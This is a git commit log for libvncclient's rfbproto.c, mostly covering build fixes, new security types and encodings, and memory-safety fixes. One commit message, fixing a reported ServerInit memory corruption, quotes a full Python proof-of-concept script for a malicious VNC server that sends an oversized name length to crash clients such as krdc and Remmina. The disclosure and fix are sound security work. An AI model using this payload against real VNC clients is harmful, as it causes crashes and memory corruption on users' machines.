path: root/libvncclient/rfbproto.c
Commit message (Author, Age, Files, Lines)
* Fix building on OSX. (Christian Beier, 2016-11-24, 1 file, -1/+1)
|
* Fix heap overflows in the various rectangle fill functions (Josef Gajdusek, 2016-11-14, 1 file, -0/+24)
|   Although rfbproto.c does check whether the overall FramebufferUpdate rectangle is too large, some of the individual encoding decoders do not, which allows a malicious server to overwrite parts of the heap.
* Merge pull request #110 from AlexejStukov/patch-1 (Christian Beier, 2016-04-12, 1 file, -1/+2)
|\
| |   break statement out of case
| * break statement out of case (Norrec, 2016-04-07, 1 file, -1/+2)
| |
* | Fix buffer overflow when applying client encodings (zbierak, 2016-04-12, 1 file, -1/+2)
|/
* Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle() (SpaceOne, 2016-01-27, 1 file, -0/+8)
|
* Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f. (Christian Beier, 2015-04-17, 1 file, -0/+4)
|
* Revert "LibVNCClient: Add H.264 encoding for framebuffer updates" (Christian Beier, 2015-04-17, 1 file, -24/+0)
|   This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c.
|
|   Conflicts:
|       configure.ac
|       libvncclient/h264.c
* Merge pull request #69 from nopdotcom/master (Christian Beier, 2015-04-17, 1 file, -1/+4)
|\
| |   Avoid divide-by-zero in raw encoding (OSX RealVNC)
| * Avoid divide-by-zero in raw encoding (OSX RealVNC) (Jay Carlson, 2015-03-27, 1 file, -1/+4)
| |   OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines.
| |
| |   The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | Initialize libgcrypt before use (Floris Bos, 2015-01-02, 1 file, -0/+10)
|/
|   https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html
|
|   "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version"
|
|   Closes issue #45
|
|   Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubuntu package) connecting to a Mac Mini.
|
|   Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption. (Christian Beier, 2014-10-10, 1 file, -1/+2)
|   This fixes the following oCERT report (oCERT-2014-008 pt.2):
|
|   There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client.
|
|   Field           Size
|   ---------------------------------
|   name-length     [4]
|   name-string     [name-length]
|
|   Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd.
|
|   Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably.
|
|   import socket,struct,sys
|   HOST = ""
|   PORT = 5900
|   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|   c.bind((HOST,PORT))
|   c.listen(1)
|   conn,addr = c.accept()
|   print "Connected by ", addr
|   protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
|   conn.send(protocolVersion3008)
|   data = conn.recv(1024) # Receive the version from them.
|   secTypeNone = "\x01\x01"
|   secTypeAuth = "\x01\x02"
|   conn.send(secTypeNone)
|   data = conn.recv(1024) # Receive the secType choice from them.
|   secResultOk = "\x00" * 4
|   secResultNo = "\x00\x00\x00\x01"
|   conn.send(secResultOk)
|   data = conn.recv(1024) # Receive the ClientInit (Shared-flag).
|   frameBufferWidth = 0x0480
|   frameBufferHeight = 0x0360
|   bitsPerPixel = 0x20
|   depth = 0x18
|   bigEndian = 0x1
|   trueColor = 0x0
|   redM = 0x0
|   greenM = 0x0
|   blueM = 0x0
|   redS = 0x0
|   greenS = 0x0
|   blueS = 0x0
|   padding = "\x00\x00\x00"
|   nameLength = 0xffffffff
|   nameString = "AA" * 0xFFFF + "\x00\x0a"
|   conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString )
|   c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX functions are renamed or deprecated (Daniel Cohen Gindi, 2014-09-20, 1 file, -1/+6)
|   For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintf (Daniel Cohen Gindi, 2014-09-02, 1 file, -0/+4)
|   In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter.
|
|   [JES: fixed commit message]
|
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentation (Johannes Schindelin, 2014-08-16, 1 file, -2/+2)
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return value (newsoft, 2014-08-15, 1 file, -3/+7)
|   If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg. (Matthias Treydte, 2014-06-23, 1 file, -0/+2)
|
* libvncclient: If we have TLS support, enable VeNCrypt by default (Johannes Schindelin, 2014-04-05, 1 file, -0/+3)
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updates (David Verbeiren, 2013-01-25, 1 file, -0/+24)
|   This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API.
|
|   This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes...
|
|   This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU).
|
|   With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions.
|
|   Instructions/Requirements:
|   * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804
|   * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows:
|       cd libva
|       git checkout v1.0-branch
|       ./autogen.sh
|       make
|       sudo make install
|       cd ..
|       git clone git://anongit.freedesktop.org/vaapi/intel-driver
|       cd intel-driver
|       git checkout v1.0-branch
|       ./autogen.sh
|       make
|       sudo make install
|
|   Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3) (Raphael Kubo da Costa, 2012-09-14, 1 file, -0/+1)
|
* Tune the definitions needed when building with -ansi. (Raphael Kubo da Costa, 2012-09-14, 1 file, -0/+1)
|   The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation.
|
|   However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdated _POSIX_SOURCE one).
|
|   _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some not too unimportant errors. (Christian Beier, 2012-05-09, 1 file, -2/+2)
|
* LibVNCClient: #undef these types in case it's WIN32. (Christian Beier, 2012-05-03, 1 file, -4/+4)
|   The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius (Boobius) on 6/1/11. (Monkey, 2012-04-23, 1 file, -0/+8)
|   Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860
* LibVNCClient: Remove all those WITH_CLIENT_TLS #ifdefs and move GnuTLS specific functionality into tls_gnutls.c. (Christian Beier, 2012-04-15, 1 file, -12/+1)
|
* When GetCredential() callback is not set, don't use authentications requiring it. (Christian Beier, 2011-11-09, 1 file, -2/+2)
|   The auth methods that employ Getcredential() will only be used if the client's GetCredential callback is actually set.
* Remove useless comparisons that always evaluate to false. (Christian Beier, 2011-03-17, 1 file, -6/+1)
|   There can not be more than 255 security types and MSLogon is RFB 3.6 only.
* Fix (most) MinGW32 compiler warnings. (Christian Beier, 2011-03-17, 1 file, -0/+2)
|
* Let libvncclient build with gcrypt for MinGW32 builds. (Christian Beier, 2011-03-12, 1 file, -0/+4)
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Add ARD (Apple Remote Desktop) security type support (Vic Lee, 2011-01-31, 1 file, -0/+216)
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Put files used by both libs into a 'common' dir. (Christian Beier, 2011-01-25, 1 file, -2/+2)
|   No functional changes. All files used by _both_ libvncserver and libvncclient are put into a 'common' directory and references from other files as well as Autotools and CMake build systems are updated.
|
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* libvnc[server|client]: implement xvp VNC extension. (Christian Beier, 2010-11-02, 1 file, -0/+52)
|   This implements the xvp VNC extension, which is described in the community version of the RFB protocol: http://tigervnc.sourceforge.net/cgi-bin/rfbproto
|
|   It is also mentioned in the official RFB protocol.
* Only define strncasecmp to _strnicmp when using MS compiler. (Christian Beier, 2010-10-21, 1 file, -5/+1)
|   Redefining strncasecmp to _strnicmp makes libvncclient hang forever in SetFormatAndEncodings() on Windows when built with MinGW64.
|
|   Reported by Tobias Doerffel <tobias.doerffel@gmail.com>, thanks!
* IP QoS support in libvncclient. (Christian Beier, 2010-09-29, 1 file, -0/+3)
|   This enables setting the DSCP/Traffic Class field of IP/IPv6 packets sent by a client. For example starting a client with -qosdscp 184 marks all outgoing traffic for expedited forwarding.
|
|   Implementation for Win32 is still a TODO, though. See http://betelco.blogspot.com/2009/03/dscp-marking-under-windows-at.html for an overview of the Win32 QoS API mess...
* Fix MinGW32 compilation with libjpeg. (Christian Beier, 2010-09-06, 1 file, -0/+3)
|   MinGW32 (or more exactly, a rpcndr.h file included by winsock2.h) typedefs a 'boolean' type that jmorecfg.h included by jpeglib.h also tries to typedef. So, tell the jpeg headers.
|
|   Closes: 3007302
* libvncclient: add ipv6 support (Vic Lee, 2010-07-08, 1 file, -13/+25)
|   [jes: pulled the "host" declarations into the conditionally compiled blocks where that variable is used. Also fixed non-IPv6 connections.]
|
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncclient: rfbResizeFrameBuffer should also set updateRect. (runge, 2010-05-08, 1 file, -0/+9)
|
* Fix compilation without TLS (Johannes Schindelin, 2010-03-13, 1 file, -1/+10)
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Add UltraVNC Repeater support in libvncclient (Vic Lee, 2010-01-16, 1 file, -0/+45)
|   [jes: adjusted coding style, made sure port is initialized correctly]
|
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Add support for viewers to select security types on demand (Vic Lee, 2010-01-01, 1 file, -6/+53)
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix version checking (>=3.8) for rfbVncAuthOK confirmation when no password required (Vic Lee, 2009-12-22, 1 file, -2/+4)
|   It seems that vino does not send AuthOK when there is no password with anonymous TLS, and it seems that vino is the only <3.8 VNC server that handles anonymous TLS at all, so let's not wait for the packet that will never come.
|
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix checks for socket values, 0 is a legal value. (Christian Beier, 2009-11-11, 1 file, -1/+1)
|   To make this work, we also have to initialize sockets to a default value of -1.
|
|   Also close a client listen socket if it's open.
|
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Merge branch 'VeNCrypt' (Johannes Schindelin, 2009-11-02, 1 file, -91/+324)
|\
| * Add MSLogon security type (Vic Lee, 2009-11-02, 1 file, -8/+116)
| |   Signed-off-by: Vic Lee <llyzs@163.com>
| |   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Add VeNCrypt support in libvncclient (Vic Lee, 2009-10-02, 1 file, -1/+74)
| |   Signed-off-by: Vic Lee <llyzs@163.com>
| * Add anonymous TLS support in libvncclient (Vic Lee, 2009-10-02, 1 file, -91/+143)
| |   Signed-off-by: Vic Lee <llyzs@163.com>
* | libvncclient: Add FinishedFrameBufferUpdate callback (Alexander Dorokhine, 2009-10-30, 1 file, -0/+3)
| |   When working on a program which searches the display for some image, one does not want to search again without getting an FB update. Add a callback to make this possible.
* | Some broken build environments treat fprintf(fh, buf) as a fatal error... (runge, 2009-10-07, 1 file, -1/+1)
| |
* | mingw32 crosscompile fixes. (Christian Beier, 2009-10-02, 1 file, -0/+2)
|/
|   SOCKET is redefined in winsock2.h so #undef it where winsock2.h is included. The changes in rfbproto.c circumvent crosscompiler errors like 'S_IFMT' undeclared ...', the Makefile.am changes avoid building linux specific stuff for a win32 host target. Also added configure option to specify sdl-config.
|
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix IsUnixSocket() (Christian Beier, 2009-10-02, 1 file, -1/+1)
|   This is a pure functionality fix: according to its manpage, stat() returns 0 on success. Checking for a return value of zero fixes incorrect results of IsUnixSocket().
|
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>